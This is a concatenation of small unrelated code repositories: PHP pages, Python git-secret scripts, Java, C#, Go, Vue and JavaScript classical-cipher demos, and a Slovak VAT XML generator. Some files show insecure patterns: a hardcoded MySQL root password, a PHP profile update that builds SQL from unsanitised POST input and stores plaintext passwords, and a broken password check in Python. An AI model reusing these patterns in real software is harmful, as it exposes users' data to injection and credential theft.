while ($record = $statement->fetch(PDO::FETCH_ASSOC)) {
?>
<div class="col-xs-12 col-sm-6 col-md-4">
<div class="panel panel-default">
<div class="panel-body">
<img src="<?php echo $record['LinkImmagine']; ?>" class="img-responsive">
</div>
</div>
</div>
<?php
}
?>
</div>
</div>
<!-- end content -->
<!-- footer -->
<footer class="footer">
<div class="container text-center">
<span class="text-muted">New Art Production Srl Via Brunacci, 5 - 30175 Marghera (VE) - Tel (+39) 041 936899 - Fax (+39) 041 5380877 - CF e P.Iva 03078210279</span>
</div>
</footer>
<!-- end footer -->
</body>
</html><file_sep><!doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="<NAME>">
<title>New Art Production</title>
<link href="css/bootstrap.css" rel="stylesheet">
<link href="css/style.css" rel="stylesheet">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="js/bootstrap.min.js"></script>
</head>
<body>
<?php
try {
$dbconn = new PDO('mysql:host=127.0.0.1;port=3306;dbname=newart_prova', 'root', 'beppe');
$dbconn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
} catch (PDOException $e) {
}
$statement = $dbconn->prepare('SELECT LinkImmagine FROM Immagini');
$statement->execute();
while ($record = $statement->fetch(PDO::FETCH_ASSOC)) {?>
<img src="<?php echo $record['LinkImmagine']; ?>">
<?php
}
?>
</body>
</html> | a30ae97e0100c3f00cf608d1e6502c62cfa38d30 | [
"PHP"
] | 2 | PHP | IoSonoIlBeppe/SitoNewArt | 022f52ce80f9b0e4b0be323828dbc6c0828b6ab8 | 81cb4903822cf80478006e5252c6b512a2a1132f |
refs/heads/master | <file_sep>import os
os.system ('git secret add 1.py 2.py && git secret hide -d ' )
os.system ('git add . ')
msg = 'Enter Commit Message: '
os.system ("git commit -m 'msg' ")
os.system ("git push -u origin master")
<file_sep>import getpass
import os
#def password():
p = getpass.getpass(prompt='Enter Password ')
if p.lower() == '<PASSWORD>89':
os.system("git secret reveal -p 'p' ")
else:
print 'Incorrect Password'
| af33071e56d013baebc5e5d5b0916f447ef57434 | [
"Python"
] | 2 | Python | hareesh309/JavaWebApp | 09c58ef038410462935382d4eef2a62d2ba0647b | 141c93490421a0dd0dfac5bd4a8a401409f024a6 |
refs/heads/master | <file_sep>import java.util.Scanner;
public class ConvertMileToKilometer {
public static void main(String[] args) {
// Create a scanner (variable) for miles
Scanner input = new Scanner(System.in);
System.out.print("Enter number of miles: ");
double mile = input.nextDouble();
// Convert miles to kilometers
double unargumentedKilometers = mile * 1.6;
// double var1 = unargumentedKilometers * 100;
// double intermediaryKilometers2 = (int) intermediaryKilometers1 / 10;
//Short the kilometers number so that it only figures with 2 decimals
//First eliminate all decimals after the second one
double var3 = unargumentedKilometers % 1;
double var4 = var3 * 100;
double var5 = (int)var4;
double var6 = var5 / 100;
//Second: we now cut the unargumented kilometers number so that only the part before the digits are counting
double var7 = (int)unargumentedKilometers;
//Third: Now we couple the cutnumber of the kilometers with the 2 decimals so that we get the kilometerconversio with 2 decimals
double argumentedKilometers = var7 + var6;
// double roundOffKilometers = (int)kilometers;
// System output kilometers
// System.out.print("kilometers traversed is:" + roundOffKilometers + "km");
System.out.print("kilometers traversed is: " + argumentedKilometers + "km");
}
} | bb72b7333e6b4a8937cde28eac9f09363ff2fcf0 | [
"Java"
] | 1 | Java | KristianWB/ItJP_Excercise_2_1 | 8ddabd4c04f0fe81392cc5be1916331ce642f241 | 59e3b9bb3e9f3b3db96cea79380b610ef72d494a |
refs/heads/master | <repo_name>mattwoberts/FreeAgent<file_sep>/FreeAgent/Models/BankTransaction.cs
using System.Collections.Generic;
namespace FreeAgent
{
public class BankTransaction : UpdatableModel
{
public string bank_account { get; set; }
public double amount { get; set; }
public string dated_on { get; set; }
public string description { get; set; }
public double unexplained_amount { get; set; }
public bool is_manual { get; set; }
}
public class BankTransactionWrapper
{
public BankTransactionWrapper()
{
bank_transaction = null;
}
public BankTransaction bank_transaction { get; set; }
}
public class BankTransactionsWrapper
{
public BankTransactionsWrapper()
{
bank_transactions = new List<BankTransaction>();
}
public List<BankTransaction> bank_transactions { get; set; }
}
}<file_sep>/FreeAgent/Models/BankTransactionExplanation.cs
using System.Collections.Generic;
namespace FreeAgent
{
/// <summary>
/// TODO: Attachments
/// </summary
public class BankTransactionExplanation : UpdatableModel
{
public string bank_account { get; set; }
public string bank_transaction{ get; set; }
public double manual_sales_tax_amount { get; set; }
public string dated_on { get; set; }
public string description { get; set; }
public double gross_value { get; set; }
public double foreign_currency_value { get; set; }
public string paid_invoice { get; set; }
public string paid_bill { get; set; }
public string paid_user { get; set; }
// public string transfer_bank_account { get; set; }
public int asset_life_years { get; set; }
}
public class BankTransactionExplanationWrapper
{
public BankTransactionExplanationWrapper()
{
bank_transaction_explanation = null;
}
public BankTransactionExplanation bank_transaction_explanation { get; set; }
}
public class BankTransactionExplanationsWrapper
{
public BankTransactionExplanationsWrapper()
{
bank_transaction_explanations = new List<BankTransactionExplanation>();
}
public List<BankTransactionExplanation> bank_transaction_explanations { get; set; }
}
}<file_sep>/FreeAgent/Models/BankAccounts.cs
using System;
using System.Collections.Generic;
namespace FreeAgent
{
//GET https://api.freeagent.com/v2/bank_accounts
//https://api.freeagent.com/v2/bank_accounts
public class BankAccount : UpdatableModel, IRemoveUrlOnSerialization
{
public double opening_balance { get; set; }
public string type { get; set; }
public string name { get; set; }
public bool is_personal { get; set; }
public string bank_name { get; set; }
public string currency { get; set; }
//for standard ones - account_number also on CC
public string account_number { get; set; }
public string sort_code { get; set; }
public string secondary_sort_code { get; set; }
public string iban { get; set; }
public string bic { get; set; }
//for paypal
public string email { get; set; }
public double current_balance { get; set; }
}
public class BankAccountWrapper
{
public BankAccountWrapper()
{
bank_account = null;
}
public BankAccount bank_account { get; set; }
}
public class BankAccountsWrapper
{
public BankAccountsWrapper()
{
bank_accounts = new List<BankAccount>();
}
public List<BankAccount> bank_accounts { get; set; }
}
public class BankAccountType
{
public static string StandardBankAccount = "StandardBankAccount";
public static string PaypalAccount = "PaypalAccount";
public static string CreditCardAccount = "CreditCardAccount";
}
}
| 8ebe4f4e2198666c55ade792471e64830b4a58b2 | [
"C#"
] | 3 | C# | mattwoberts/FreeAgent | 453e436c72f69925139d78d908e558af172cd5ca | 65cdaab88b6eaa2f46f0d14a4ba9cc412c5025be |
refs/heads/master | <repo_name>sutulustus/vat_statement_generator<file_sep>/views/site/vat_declaration.php
<?xml version="1.0" encoding="utf-8"?>
<dokument>
<hlavicka>
<identifikacneCislo>
<kodStatu>SK</kodStatu>
<cislo>1082215475</cislo>
</identifikacneCislo>
<dic></dic>
<danovyUrad>Banská Bystrica</danovyUrad>
<nevzniklaPov>0</nevzniklaPov>
<typDP>
<rdp>1</rdp>
<odp>0</odp>
<ddp>0</ddp>
<datumZisteniaDdp></datumZisteniaDdp>
</typDP>
<osoba>
<platitel>1</platitel>
<registrovana>0</registrovana>
<inaPovinna>0</inaPovinna>
<zdanitelna>0</zdanitelna>
<zastupca>0</zastupca>
</osoba>
<zdanObd>
<mesiac></mesiac>
<stvrtrok><?= $quarter ?></stvrtrok>
<rok><?= $year ?></rok>
</zdanObd>
<meno>
<riadok><NAME></riadok>
<riadok></riadok>
<riadok></riadok>
</meno>
<adresa>
<ulica>Javornícka</ulica>
<cislo>6169/31</cislo>
<psc>97411</psc>
<obec>Banská Bystrica I</obec>
<tel>
<predcislie></predcislie>
<cislo></cislo>
</tel>
<fax>
<predcislie></predcislie>
<cislo></cislo>
</fax>
</adresa>
<opravnenaOsoba>
<menoPriezvisko></menoPriezvisko>
<tel>
<predcislie></predcislie>
<cislo></cislo>
</tel>
</opravnenaOsoba>
<datumVyhlasenia><?= date('d.m.Y') ?></datumVyhlasenia>
</hlavicka>
<telo>
<r01></r01>
<r02></r02>
<r03><?= nf($base) ?></r03>
<r04><?= nf($vat) ?></r04>
<r05></r05>
<r06></r06>
<r07></r07>
<r08></r08>
<r09></r09>
<r10></r10>
<r11></r11>
<r12></r12>
<r13></r13>
<r14></r14>
<r15></r15>
<r16></r16>
<r17></r17>
<r18></r18>
<r19><?= nf($vat) ?></r19>
<r20></r20>
<r21><?= nf($debits) ?></r21>
<r22></r22>
<r23><?= nf($debits) ?></r23>
<r24></r24>
<r25></r25>
<r26></r26>
<r27></r27>
<r28></r28>
<r29></r29>
<r30></r30>
<r31><?= nf($vat - $debits) ?></r31>
<splneniePodmienok>0</splneniePodmienok>
<r32></r32>
<r33></r33>
<r34><?= nf($vat - $debits) ?></r34>
<r35></r35>
<r36></r36>
<r37></r37>
<r38></r38>
</telo>
</dokument>
<file_sep>/controllers/SiteController.php
<?php
namespace app\controllers;
use Yii;
use yii\web\Controller;
class SiteController extends Controller
{
public function actions()
{
return [
'error' => [
'class' => 'yii\web\ErrorAction',
],
'captcha' => [
'class' => 'yii\captcha\CaptchaAction',
'fixedVerifyCode' => YII_ENV_TEST ? 'testme' : null,
],
];
}
public function actionIndex()
{
list($incomes, $expenses, $corrections) = $this->getData();
list($vatSum, $vatBaseSum, $vatDebitsSum) = $this->getDeclaration($incomes, $expenses, $corrections);
$showMsg = Yii::$app->session['success'];
unset(Yii::$app->session['success']);
return $this->render('index', array(
'incomes' => $incomes,
'expenses' => $expenses,
'corrections' => $corrections,
'vatSum' => $vatSum,
'vatBaseSum' => $vatBaseSum,
'vatDebitsSum' => $vatDebitsSum + Yii::$app->session['billsDeduction'],
'year' => Yii::$app->session['year'] ?: date('Y'),
'quarter' => Yii::$app->session['quarter'] ?: ceil(date('m')/3),
'bills' => Yii::$app->session['bills'] ?: '',
'showMsg' => $showMsg
));
}
public function actionGenerate()
{
$selectedIncomes = Yii::$app->request->post('incomes');
$selectedExpenses = Yii::$app->request->post('expenses');
$selectedCorrections = Yii::$app->request->post('corrections');
if(!$selectedIncomes) $selectedIncomes = [];
if(!$selectedExpenses) $selectedExpenses = [];
if(!$selectedCorrections) $selectedCorrections = [];
list($incomes, $expenses, $corrections) = $this->getData();
list($vatSum, $vatBaseSum, $vatDebitsSum) = $this->getDeclaration($incomes, $expenses, $corrections);
$incomes = array_intersect_key($incomes, array_flip($selectedIncomes));
$expenses = array_intersect_key($expenses, array_flip($selectedExpenses));
$corrections = array_intersect_key($corrections, array_flip($selectedCorrections));
$bills = (float)Yii::$app->request->post('bills');
$billsDeduction = ($bills - $bills / 1.2) * 0.8;
if(Yii::$app->request->post('calculate')) {
Yii::$app->session['year'] = Yii::$app->request->post('year');
Yii::$app->session['quarter'] = Yii::$app->request->post('quarter');
Yii::$app->session['bills'] = Yii::$app->request->post('bills');
Yii::$app->session['billsDeduction'] = $billsDeduction;
return $this->goHome();
}
$xml = $this->renderPartial('control_statement', array(
'incomes' => $incomes,
'expenses' => $expenses,
'corrections' => $corrections,
'quarter' => Yii::$app->request->post('quarter'),
'year' => Yii::$app->request->post('year'),
'bills' => array(
'vat' => $bills - $bills / 1.2,
'vatBase' => $bills / 1.2, 2,
'deduction' => $billsDeduction
)
));
file_put_contents("output/control_statement_".date('Y_m_d').'.xml', $xml);
$xml = $this->renderPartial('vat_declaration', array(
'vat' => $vatSum,
'base' => $vatBaseSum,
'debits' => $vatDebitsSum + $billsDeduction,
'quarter' => ['I', 'II', 'III', 'IV'][Yii::$app->request->post('quarter') - 1],
'year' => Yii::$app->request->post('year')
));
file_put_contents("output/vat_declaration_".date('Y_m_d').'.xml', $xml);
Yii::$app->session['success'] = true;
return $this->goHome();
}
private function getData()
{
$clients = $this->getClients();
$data = $this->getExpenses($clients);
$expenses = $data['expenses'];
$corrections = $data['corrections'];
$incomes = $this->getIncomes();
uasort($expenses, function($a, $b) { return strtotime($a['date']) - strtotime($b['date']); });
uasort($corrections, function($a, $b) { return strtotime($a['date']) - strtotime($b['date']); });
uasort($incomes, function($a, $b) { return strtotime($a['date']) - strtotime($b['date']); });
return array($incomes, $expenses, $corrections);
}
private function getDeclaration($incomes, $expenses, $corrections)
{
$vatSum = $vatBaseSum = $vatDebitsSum = 0;
foreach($incomes as $income) {
$vatSum += $income['vat'];
$vatBaseSum += $income['vatBase'];
}
foreach($expenses as $expense) {
$vatDebitsSum += $expense['vat'];
}
foreach($corrections as $correction) {
$vatDebitsSum += $correction['vat'];
}
return array($vatSum, $vatBaseSum, $vatDebitsSum);
}
private function getClients()
{
$data = $this->readCSV('klienti.csv');
array_shift($data);
$clients = [];
foreach($data as $client) {
if(!$client[6]) continue;
$clients[$client[0]] = array(
'ico' => preg_replace('/\s/', '', $client[4]),
'dic' => $client[5],
'icdph' => $client[6],
);
}
return $clients;
}
private function getIncomes()
{
$data = $this->readCSV('vystavene_faktury.csv');
array_shift($data);
$incomes = [];
foreach($data as $income) {
$date = \DateTime::createFromFormat('d.m.Y', $income[9]);
$vat = (float)str_replace(array(' ', '.', ','), array('', '', '.'), $income[11]);
$client = preg_replace('/\s/', '', $income[6]);
$invoice = $income[2];
if(!$client || !$invoice) continue;
$incomes[$invoice] = array(
'client' => $client,
'vat' => $vat,
'vatBase' => (float)str_replace(array(' ', '.', ','), array('', '', '.'), $income[10]),
'date' => $date->format('Y-m-d'),
'invoice' => $invoice,
);
}
return $incomes;
}
private function getExpenses($clients)
{
$data = $this->readCSV('vydavky.csv');
array_shift($data);
$expenses = ['expenses' => [], 'corrections' => []];
foreach($data as $expense) {
$clientName = $expense[3];
$vat = (float)str_replace(array(' ', '.', ','), array('', '', '.'), $expense[12]);
$invoice = $expense[22];
$date = \DateTime::createFromFormat('d.m.Y', $expense[6]);
if(!array_key_exists($clientName, $clients) || !$invoice) continue;
$client = $clients[$clientName];
$type = $vat > 0 ? 'expenses' : 'corrections';
$expenses[$type][$invoice] = array(
'name' => $expense[1],
'client' => $client['icdph'],
'vatBase' => (float)str_replace(array(' ', '.', ','), array('', '', '.'), $expense[11]),
'vat' => $vat,
'date' => $date->format('Y-m-d'),
'invoice' => $invoice,
'price' => (float)$expense[9]
);
if(strpos($expense[1], 'DOBROPIS') !== false) {
$expenses[$type][$invoice]['baseInvoice'] = preg_replace('/DOBROPIS|[^A-z0-9]/', '', $expense[1]);
}
}
return $expenses;
}
private function readCSV($fileName)
{
$file = "input/$fileName";
if(!file_exists($file)) return [];
$csvData = file_get_contents($file);
$lines = explode(PHP_EOL, $csvData);
$array = [];
foreach ($lines as $line) {
$array[] = str_getcsv($line);
}
return $array;
}
}
<file_sep>/views/site/index.php
<?php
/* @var $this yii\web\View */
use yii\grid\GridView;
use yii\data\ArrayDataProvider;
use yii\widgets\ActiveForm;
use yii\helpers\Html;
$this->title = 'Generator kontrolneho vykazu DPH';
?>
<div class="site-index">
<div class="body-content">
<?php
$form = ActiveForm::begin([
'method' => 'post',
'action' => ['site/generate'],
]);
?>
<?php if($showMsg) : ?>
<div class="row">
<div class="alert alert-success" role="alert">
<strong>Uspech!</strong> Kontrolny vykaz bol vygenerovany.
</div>
</div>
<?php endif; ?>
<div class="row">
<div class="col-lg-4">
<label>Kvartal:</label>
<?= Html::textInput('quarter', $quarter) ?>
</div>
<div class="col-lg-4">
<label>Rok:</label>
<?= Html::textInput('year', $year) ?>
</div>
<div class="col-lg-4">
<label>Blocky:</label>
<?= Html::textInput('bills', $bills) ?>
</div>
</div>
<div class="row">
<div class="col-lg-12">
<?php
$incomesProvider = new ArrayDataProvider([
'allModels' => $incomes,
]);
echo GridView::widget([
'dataProvider' => $incomesProvider,
'tableOptions' => ['class' => 'table table-striped table-bordered table-hover'],
'caption' => 'Prijmy',
'summary' => '',
'showOnEmpty' => false,
'rowOptions' => function($model) {
return ['class' => $model['vat'] ? '' : 'danger'];
},
'columns' => array(
[
'class' => 'yii\grid\CheckboxColumn',
'name' => 'incomes',
'checkboxOptions' => function($model) {
return [
'value' => $model['invoice'],
'checked' => $model['vat'] ? 'checked' : ''
];
},
],
'client', 'vat', 'vatBase', 'date', 'invoice'
)
]);
?>
</div>
</div>
<div class="row">
<div class="col-lg-12">
<?php
$expensesProvider = new ArrayDataProvider([
'allModels' => $expenses,
]);
echo GridView::widget([
'dataProvider' => $expensesProvider,
'tableOptions' => ['class' => 'table table-striped table-bordered table-hover'],
'caption' => 'Naklady',
'summary' => '',
'showOnEmpty' => false,
'rowOptions' => function($model) {
return ['class' => $model['vat'] ? '' : 'danger'];
},
'columns' => array(
[
'class' => 'yii\grid\CheckboxColumn',
'name' => 'expenses',
'checkboxOptions' => function($model) {
return [
'value' => $model['invoice'],
'checked' => $model['vat'] ? 'checked' : ''
];
},
],
'name', 'client', 'vatBase', 'vat', 'date', 'invoice', 'price'
)
]);
?>
</div>
</div>
<div class="row">
<div class="col-lg-12">
<?php
$correctionsProvider = new ArrayDataProvider([
'allModels' => $corrections,
]);
echo GridView::widget([
'dataProvider' => $correctionsProvider,
'tableOptions' => ['class' => 'table table-striped table-bordered table-hover'],
'caption' => 'Dobropisy',
'summary' => '',
'showOnEmpty' => false,
'rowOptions' => function($model) {
return ['class' => $model['vat'] ? '' : 'danger'];
},
'columns' => array(
[
'class' => 'yii\grid\CheckboxColumn',
'name' => 'corrections',
'checkboxOptions' => function($model) {
return [
'value' => $model['invoice'],
'checked' => $model['vat'] ? 'checked' : ''
];
},
],
'name', 'client', 'vatBase', 'vat', 'date', 'baseInvoice', 'invoice', 'price'
)
]);
?>
</div>
</div>
<div class="row">
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title">Priznanie k DPH</h3>
</div>
<ul class="list-group">
<li class="list-group-item">Zaklad DPH:</li>
<li class="list-group-item">
<strong><?= nf($vatBaseSum) ?></strong>
</li>
<li class="list-group-item">Fakturovana DPH:</li>
<li class="list-group-item">
<strong><?= nf($vatSum) ?></strong>
</li>
<li class="list-group-item">Odpocet DPH:</li>
<li class="list-group-item">
<strong><?= nf($vatDebitsSum) ?></strong>
</li>
<li class="list-group-item">Vysledna DPH na zaplatenie:</li>
<li class="list-group-item">
<strong><?= nf($vatSum - $vatDebitsSum) ?></strong>
</li>
</ul>
</div>
</div>
<?= Html::submitButton('Prepocitat', ['name' => 'calculate', 'value' => 1, 'class' => 'btn btn-primary']) ?>
<?= Html::submitButton('Vygenerovat XML', ['class' => 'btn btn-success']) ?>
<?php $form->end(); ?>
</div>
</div>
<file_sep>/views/site/control_statement.php
<?xml version="1.0" encoding="utf-8"?>
<KVDPH xmlns="https://ekr.financnasprava.sk/Formulare/XSD/kv_dph_2014.xsd">
<Identifikacia>
<IcDphPlatitela>SK1082215475</IcDphPlatitela>
<Druh>R</Druh>
<Obdobie>
<Rok><?= $year ?></Rok>
<Stvrtrok><?= $quarter ?></Stvrtrok>
</Obdobie>
<Nazov><NAME></Nazov>
<Stat></Stat>
<Obec>Banská Bystrica I</Obec>
<PSC>97411</PSC>
<Ulica>Javornícka</Ulica>
<Cislo>6169/31</Cislo>
<Tel></Tel>
<Email></Email>
</Identifikacia>
<Transakcie>
<?php foreach($incomes as $income) : ?>
<A1 S="20" D="<?= nf($income['vat']) ?>" Z="<?= nf($income['vatBase']) ?>" Den="<?= $income['date'] ?>" F="<?= $income['invoice'] ?>" Odb="<?= $income['client'] ?>"/>
<?php endforeach; ?>
<?php foreach($expenses as $expense) : ?>
<B2 O="<?= nf($expense['vat']) ?>" S="20" D="<?= nf($expense['vat']) ?>" Z="<?= nf($expense['vatBase']) ?>" Den="<?= $expense['date'] ?>" F="<?= $expense['invoice'] ?>" Dod="<?= $expense['client'] ?>"/>
<?php endforeach; ?>
<B3 O="<?= nf($bills['deduction']) ?>" D="<?= nf($bills['vat']) ?>" Z="<?= nf($bills['vatBase']) ?>"/>
<?php foreach($corrections as $correction) : ?>
<C2 OR="<?= nf($correction['vat']) ?>" S="20" DR="<?= nf($correction['vat']) ?>" ZR="<?= nf($correction['vatBase']) ?>" FP="<?= $correction['baseInvoice'] ?>" FO="<?= $correction['invoice'] ?>" Dod="<?= $correction['client'] ?>"/>
<?php endforeach; ?>
</Transakcie>
</KVDPH>
| 9bb1b5a1597f85127d35352c90fc7d4b9fb7173d | [
"PHP"
] | 4 | PHP | sutulustus/vat_statement_generator | 9f8406d1e6be39f79124b1179f8e3752e18e83c8 | cd021d4430e4e4b41f89d8b5cc2af3fa4f3db030 |
refs/heads/master | <file_sep>import Vue from 'vue'
import Router from 'vue-router'
import HelloWorld from '../components/HelloWorld'
import Dfooter from '../components/common/Dfooter/Dfooter'
import personalCenter from '../components/page/personalCenter/personalCenter'
import orders from '../components/page/orders/orders'
import index from '../components/page/index/index'
import goods from '../components/goods/goods'
import appointment from '../components/page/appointment/appointment'
import cook from '../components/page/cook/cook'
import cookDetail from '../components/page/cookDetail/cookDetail'
import cookOrders from '../components/page/cookOrders/cookOrders'
import map from '../components/common/map/map'
Vue.use(Router)
export default new Router({
mode:'history',
routes: [
{
path: '/',
redirect: '/index'
},
{
path: '/Dfooter',
component: Dfooter,
children:[
{
path: '/index',
component: index
},
{
path: '/orders',
component: orders
},
{
path: '/personalCenter',
component: personalCenter
},
{
path: '/goods',
component: goods
},
{
path: '/appointment',
component: appointment
},
]
},
{
path: '/cook',
redirect: '/cookOrders',
component: cook,
children:[
{
path: '/cookDetail',
component: cookDetail
},
{
path: '/cookOrders',
component: cookOrders
},
]
},
{
path: '/map',
component: map
},
],
linkActiveClass:'active',
})
| 64e00665eec024a4cddb43e699f065b8c98284d5 | [
"JavaScript"
] | 1 | JavaScript | hong597853910/diancan | 94092aaf1ef3711b3aec6bceccccb1a6661f0ec2 | 3f707ac8fbb246210ce5b1639920e7dbcc90207d |
refs/heads/master | <file_sep>// vigenere.js
var alphabet = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"];
function getKeyLetterAlphabetPosition(number, key) { // take number as the position of the input letter, so that we can match it with a key letter
var keyLetterPosition = number % key.length; // % uses modular arithmetic to "loop around", matching a number to the key letter position
var keyLetterAtPosition = key.charAt(keyLetterPosition);
return alphabet.indexOf(keyLetterAtPosition);
}
function crypt(mode, input, key) {
var finaloutput = "";
for (var i = 0; i < input.length; i++) {
if (input.charAt(i) == "\n") {
continue; // it's a newline: we don't need to keep going - go straight to the next letter
}
var inputLetterPosition = alphabet.indexOf(input.charAt(i));
var finalLetterPosition = "";
if (mode === true) { // encryption mode
finalLetterPosition = (inputLetterPosition + getKeyLetterAlphabetPosition(i, key)) % alphabet.length; // add the position of the original letter with the alphabet position of the corresponding key letter, and wrap around the alphabet length
} else if (mode === false) { // decryption mode
var possibleLetterPosition = (inputLetterPosition - getKeyLetterAlphabetPosition(i, key));
if (possibleLetterPosition < 0) {
finalLetterPosition = possibleLetterPosition + alphabet.length; // if the number is negative, "loop around" by adding the length of the alphabet to it
} else {
finalLetterPosition = possibleLetterPosition;
}
}
finaloutput += alphabet[finalLetterPosition]; // get the actual letter and add it to the finaloutput
}
return finaloutput;
}
<file_sep>var inputtext;
var key;
function gid(a) {
return document.getElementById(a);
}
var plaintextbox = gid("plaintextbox");
var keybox = gid("keybox");
var outputbox = gid("outputbox");
function updatevars() {
inputtext = plaintextbox.value;
key = parseInt(keybox.value);
}
function visualcrypt(mode) {
updatevars();
outputbox.innerHTML = crypt(mode, inputtext, key);
}
function encrypt() {
visualcrypt(true);
}
function decrypt() {
visualcrypt(false);
}
document.getElementById("encryptbtn").addEventListener("click", encrypt);
document.getElementById("decryptbtn").addEventListener("click", decrypt);
<file_sep>// A Caesar cipher implementation with support for custom alphabets
var alphabet = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"];
var origalphabet = alphabet;
var upperbet = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z"];
var lowandup = origalphabet.concat(upperbet);
var alphanumeric = lowandup.concat(["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]);
function crypt(mode, input, key) {
var outputtext = "";
if (key < 1 || key > (alphabet.length - 1)) {
outputtext = "Error: key was lower than 1 or greater than " + (alphabet.length - 1);
return outputtext; // end the function
}
for (var i = 0; i < input.length; i++) { // loop through all of the inputtext
var position = alphabet.indexOf(input.charAt(i));
var l;
if (mode === true) { // encryption mode
l = position + key;
l = l % alphabet.length;
}
if (mode === false) { // decryption mode
l = position - key;
if (l < 0) {
l = l + alphabet.length;
}
}
outputtext += alphabet[l]; // put the outputtext letter in the ciphertext
}
return outputtext;
}
<file_sep>function gid(id) {
return document.getElementById(id);
}
var inputbox = gid("input");
var outputbox = gid("output");
var keybox = gid("key");
var encryptbtn = gid("encryptbtn");
var decryptbtn = gid("decryptbtn");
var input, key;
function updatevars() {
// strip spaces
input = inputbox.value.replace(/ /g, "");
key = keybox.value.replace(/ /g, "");
}
function visualcrypt(mode) {
updatevars();
var beginTime = (new Date()).getTime();
outputbox.innerHTML = crypt(mode, input, key);
var endTime = (new Date()).getTime();
console.log("Ciphering operation took " + (endTime - beginTime) + " millisecond(s)");
}
function encrypt() {
visualcrypt(true);
}
function decrypt() {
visualcrypt(false);
}
encryptbtn.addEventListener("click", encrypt);
decryptbtn.addEventListener("click", decrypt);
<file_sep># js-crypt-demos
**No longer developed:** Please check out the new [crypto-toolkit](https://github.com/mariuszskon/crypto-toolkit) repository.
This is a repo with a couple of custom made JavaScript which can encrypt and decrypt with various (weak) algorithms.
**Warning:** I am not a professional cryptographer. Do not use these tools to secure important confidential communications.
| ab08001528ba693980943026a993c960889dbc68 | [
"JavaScript",
"Markdown"
] | 5 | JavaScript | mariuszskon/js-crypto-demos | 78cd3edfdda62b0a02ae25af7b24a52450e1e0bb | 3725ab19bf13abd2c9eb356cf3a06ca7b4ff844b |
refs/heads/master | <file_sep>package main
import (
"testing"
)
func TestParseSyslogNgMetricsReturnsValue(t *testing.T) {
input := []byte("SourceName;SourceId;SourceInstance;State;Type;Number\n1;2;3;4;5;6\n")
metrics := parseSyslogNgMetrics(input)
if len(metrics) == 0 {
t.Errorf("Returned metrics are nil")
}
}
<file_sep>/*TODO:
* sort the metrics output
* output HELP information for each metric
* output TYPE information for each metric
*/
package main
import (
"fmt"
"log"
"os/exec"
"strings"
)
// parseSyslogNgMetrics takes output from `syslog-ng-ctl stats` command
// and converts it to Prometheus text metrics format
func parseSyslogNgMetrics(stats []byte) (metrics string) {
var metricsSlice []string
strStats := strings.Trim(string(stats[:]), "\n")
// Remove the first line of output, which contains field
// headers.
for _, line := range strings.Split(strStats, "\n")[1:] {
s := strings.Split(line, ";")
// since `type` is a keyword in Go, we rename the `type`
// field from SyslogNG to `typeo`. No reason behind
// picking this name.
sourceName, sourceID, sourceInstance, state, typeo, number := s[0], s[1], s[2], s[3], s[4], s[5]
metricsSlice = append(metricsSlice, fmt.Sprintf("syslog_ng_%s_total{source_name=\"%s\",source_id=\"%s\",source_instance=\"%s\",state=\"%s\"} %s\n", typeo, sourceName, sourceID, sourceInstance, state, number))
}
metrics = strings.Trim(strings.Join(metricsSlice, ""), "\n")
return
}
func main() {
stdout, err := exec.Command("/usr/local/sbin/syslog-ng-ctl", "stats").Output()
if err != nil {
log.Fatal(err)
}
fmt.Printf("%s", stdout)
fmt.Println(parseSyslogNgMetrics(stdout))
}
| 342f165d6567477187ab3fd2cbcb055a749f3437 | [
"Go"
] | 2 | Go | zygiss/textfile-collectors | d9a386759d7399fb7414c97677c7081632a09be9 | a4e1b954775df0395fb16b145a9c7ef55f2a6271 |
refs/heads/main | <file_sep><?php
session_start();
include('../config/connection.php');
$upit = "SELECT * FROM users WHERE id=".$_SESSION['UserId'];
$execute = $con->query($upit);
$row = $execute->fetch_assoc();
$username=$row['username'];
$password=$row['<PASSWORD>'];
$check=true;
if (isset($_POST['submit'])) {
if(!empty($_POST['name'])){
if(strlen($_POST['name'])>4) {
$name = $_POST['name'];
}else{
$check = false;
}
}else{
$check = false;
}
if(!empty($_POST['password'])){
if(strlen($_POST['password'])>4) {
$pass = $_POST['password'];
}else{
$check = false;
}
}else{
$check = false;
}
if($check){
$upit = 'UPDATE users SET username="'.$name.'",password="'.$pass.'" WHERE id='.$_SESSION['UserId'];
$execute = $con->query($upit);
header('Location:home.php');
}
}
if (!isset($_SESSION["UserId"])) {
header('Location:index.php');
}
?>
<!doctype html>
<html lang="en">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Bootstrap CSS -->
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script> <title>Task Org</title>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js"></script>
<link href="css/submitBtn.css" rel="stylesheet">
</head>
<body>
<nav class="navbar navbar-expand-md navbar-dark" style="background-color: #e3a529;">
<a class="navbar-brand" href="home.php" style="margin-top: 10px">Task Org</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarsExample04" aria-controls="navbarsExample04" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarsExample04">
<ul class="navbar-nav mr-auto">
</ul>
<form class="form-inline my-2 my-md-0">
<ul class="navbar-nav mr-auto" >
<li class="nav-item dropdown" style="margin-right: 35px;: ">
